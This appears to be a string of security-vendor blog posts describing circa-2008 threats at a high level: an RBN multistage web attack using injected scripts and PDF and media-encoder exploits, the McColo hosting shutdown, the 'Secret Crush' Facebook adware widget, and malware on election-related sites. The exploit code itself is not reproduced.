eSafe AID – the Attack Intelligence Datacenter has recently discovered a new massive Web attack, operated by RBN, in which an exploit code is being injected on compromised legitimate websites. The injected obfuscated malicious script points to a remote obfuscated hidden IFrame that leads to another obfuscated exploit. The last chain of this multistage Web attack includes Adobe PDF and Windows media encoder exploit variants.

The attack stages:

The first obfuscated exploit code has a low detection rate by Anti-virus vendors. eSafe detects the exploit as JS.Agent.au

The obfuscated exploit code:
 

Virus Total results:
 
 

The attack stages in brief:

1. A user visits a legitimate hacked website where an obfuscated script leads to other hacked websites.
2. The second stage hacked websites, located in Ukraine, contain obfuscated hidden IFrames that lead to the hacker’s server.
3. The obfuscated exploit code on the hacker sever contains Adobe PDF and Windows media encoder exploit variants.
4. Affected systems are automatically joined to a bot controller located in Luxemburg.

Tracking the footprints of these domains leads to the infamous RBN (hosting illegal sites, DDos attacks, Hacking, and pornography).

A lot of write-ups have been covering this, so here are a few from InformationWeek, Dancho, SCMagazine and McAfee.

Besides saying the ever satisfying “told you so”, nothing much to add here. More bogus profiles enticing users to connect to them, look at the content, and catch the same old nastiness – only packaged in another format. Just remember that social networks, just like in real life, can be a great playground for eCriminals – this is just the tip of the iceberg. What would have happened if you were to see the profile of a person you actually know on LinkedIn (or any other network for that matter), and click on a link from it that is actually malicious? That would be much more effective, and not that far-fetched wouldn’t it?

Recently, there has been a lot of focus from the security research community on a hosting provider named McColo corporation (out of San Jose, CA). Reports on spam, phishing and connections to Malweb distribution amongst other have been accumulating (including our own malicious server analysis which has been spotted to be administered from a McColo address).

It seems like the combination of law enforcement investigations with a recent story by the Washington Post have made their mark and McColo IP addresses have gone silent since yesterday. We’ll be looking forward to additional coverage on this in the coming days, as we are finalizing our own threat report on the eCrime server that has been analyzed, and on which we found the 200,000 compromised FTP credentials.

The Secret Crush invites Facebook users to find out which of their friends is latently in love with them. Users who would click the link would find out that it is actually an adware application that’s targeting them.

This malicious widget made its first appearance early January 2008.  It played on the popularity of Facebook and managed to entice millions of Facebook users to download the infamous Zango adware. Recently, this malicious widget has reappeared and has been infecting users with additional adware such as Zwinky. Facebook users receive an invitation that says: “Someone has a secret crush on you. Find Out Who!” Clicking the “Find Out Who!” link randomly redirects the browser to a number of websites. The target websites may range from hosted ads to adware serving domains.

Here is how the application’s invitation message would look like:

And here are the adware websites that users get redirected to:

 

And the leader according to the highly non-scientific research done using Google for a specific attack vector is: Barack Obama. Obama related sites have managed to get infected in such a way that they attack their visitors in 364 separate instances, while McCain is right behind with 230 instances.

As always, and as we have reported in the past, those behind eCrime are watching the news as diligently as the rest of us and are “affected” by current affairs in terms of the ways they tune their attack vector to achieve maximum exposure to their target market. The financial situation, jobs, housing, and now the US elections are causing a shift in the context of the sites targeted to carry malicious code and perform web attacks in order to gain as many “eyeballs” as possible.

Now, given that this example is just the tip of the iceberg, and only gives a general idea on one specific attack vector, the conclusion is pretty obvious in terms of the global magnitude of having relevant sites infected with Malweb. Do the math, Google’s own tools enable some pretty insightful data into the search trends (and thus the chances that a site that comes up in one of the first 100 results of such search terms) both for sociological and technological studies, as well as for eCrime market reach optimization.

(Image showing Google’s trends search volume for the phrases “john mccain” and “barack obama”)

Now that’s why security research is a little more than just playing cat-and-mouse with a technological attack or a new vulnerability. Security research is also the understanding of how the motive and MO of the attackers work in order to be prepared for the next wave and the next technological advancements.